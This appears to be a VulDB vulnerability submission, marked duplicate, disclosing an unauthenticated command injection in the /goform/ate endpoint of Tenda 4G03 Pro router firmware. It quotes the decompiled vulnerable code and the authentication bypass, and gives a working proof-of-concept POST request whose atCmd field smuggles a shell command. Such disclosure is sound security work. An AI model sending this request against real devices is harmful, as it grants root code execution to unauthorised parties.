| Título | Tenda Tenda 4G03 Pro V1.0 V04.03.01.53 OS Command Injection |
|---|
| Descripción | Tenda 4G03 Pro V1.0 /bin/httpd /goform/ate unauthenticated command injection
The /goform/ate endpoint in /usr/sbin/httpd of Tenda 4G03 Pro V1.0
firmware V04.03.01.53 passes the HTTP parameter atCmd directly to
td_common_popen() via snprintf() without sanitization. The
authentication handler FUN_00021a54 explicitly bypasses all security
checks for this endpoint when the admin password is unset, which is
the factory default state. An unauthenticated LAN attacker can
achieve root code execution with a single HTTP POST request.
POC:
Vulnerable code (FUN_000268b4 in /usr/sbin/httpd):
__s1 = FUN_0001f104(param_1, "atCmd");
snprintf(acStack_614, 0x1ff, "serial_atcmd at+%s\r", __s1);
td_common_popen(acStack_614, ...);
Auth bypass (FUN_00021a54):
if (strncmp(url, "/goform/ate", 0xb) == 0 &&
DAT_00050f14 == '\0') goto pass_through;
PoC request:
POST /goform/ate HTTP/1.1
Host: 192.168.0.1
Content-Type: application/json
{"atCmd":"ati; id > /tmp/pwned"} |
|---|
| Usuario | CoreNode (UID 96566) |
|---|
| Sumisión | 2026-03-18 03:13 (hace 20 días) |
|---|
| Moderación | 2026-04-04 08:17 (17 days later) |
|---|
| Estado | Duplicado |
|---|
| Entrada de VulDB | 333199 [Tenda 4G03 Pro hasta 04.03.01.44 /usr/sbin/httpd escalada de privilegios] |
|---|
| Puntos | 0 |
|---|